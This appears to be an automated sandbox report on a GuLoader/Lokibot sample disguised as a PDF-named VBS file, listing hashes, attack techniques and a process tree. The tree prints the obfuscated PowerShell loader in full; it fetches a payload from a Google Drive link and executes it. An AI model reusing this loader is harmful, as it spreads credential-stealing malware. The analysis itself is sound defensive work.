guloader | b8911aa1f56a7803220464354c15dbdce5c70d0b66b03bd0aba25c0155f2f161

General

Target

DOSTOROZPOET09-23-2024pdf.vbs
Size

35KB
MD5

fa21d757a727ace9fab8ba22e03f7dc5
SHA1

edaa3726683853a70e8176f2368e3254192a9a11
SHA256

b8911aa1f56a7803220464354c15dbdce5c70d0b66b03bd0aba25c0155f2f161
SHA512

3aaee7bc7a1726c193c36362d952c64eae4dc49ef2946bf430d8367cc012317ee7de3a761d3d079af72b8ce61d029b19f8fa3f24e1d8ba4d46064e0301f60925
SSDEEP

384:3ccI8+xqQKYYKmlKCKQakPsZOqP1tVzFdk4GL283f48QihlTCEAZpdk/yKR:sc+AnjlKCKgE77V0z7lTCEAZIDR

Score

10^/10

guloader lokibot collection credential_access discovery downloader spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2648	WScript.exe
5	2576	powershell.exe
7	2576	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
10	drive.google.com

Network Service Discovery 1 TTPs 3 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2576	powershell.exe
1104	cmd.exe
1828	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
580	wabmig.exe
580	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1828	powershell.exe
580	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1828 set thread context of 580	1828	powershell.exe	37

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1828	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2576	powershell.exe
1828	powershell.exe
1828	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1828	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	1828	powershell.exe
Token: SeDebugPrivilege	580	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2648 wrote to memory of 2576	2648	WScript.exe	30
PID 2648 wrote to memory of 2576	2648	WScript.exe	30
PID 2648 wrote to memory of 2576	2648	WScript.exe	30
PID 2576 wrote to memory of 2572	2576	powershell.exe	32
PID 2576 wrote to memory of 2572	2576	powershell.exe	32
PID 2576 wrote to memory of 2572	2576	powershell.exe	32
PID 2576 wrote to memory of 1104	2576	powershell.exe	34
PID 2576 wrote to memory of 1104	2576	powershell.exe	34
PID 2576 wrote to memory of 1104	2576	powershell.exe	34
PID 1104 wrote to memory of 1828	1104	cmd.exe	35
PID 1104 wrote to memory of 1828	1104	cmd.exe	35
PID 1104 wrote to memory of 1828	1104	cmd.exe	35
PID 1104 wrote to memory of 1828	1104	cmd.exe	35
PID 1828 wrote to memory of 2984	1828	powershell.exe	36
PID 1828 wrote to memory of 2984	1828	powershell.exe	36
PID 1828 wrote to memory of 2984	1828	powershell.exe	36
PID 1828 wrote to memory of 2984	1828	powershell.exe	36
PID 1828 wrote to memory of 580	1828	powershell.exe	37
PID 1828 wrote to memory of 580	1828	powershell.exe	37
PID 1828 wrote to memory of 580	1828	powershell.exe	37
PID 1828 wrote to memory of 580	1828	powershell.exe	37
PID 1828 wrote to memory of 580	1828	powershell.exe	37
PID 1828 wrote to memory of 580	1828	powershell.exe	37

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DOSTOROZPOET09-23-2024pdf.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper ucpiggeTP.eud c evvSfacetYAfstrs AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg ,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;"
  2⤵
  - Blocklisted process makes network request
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2576
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hygrophthalmic.dis && echo t"
    3⤵
    PID:2572
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper ucpiggeTP.eud c evvSfacetYAfstrs AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg ,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;"
    3⤵
    - Network Service Discovery
    - Suspicious use of WriteProcessMemory
    PID:1104
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper 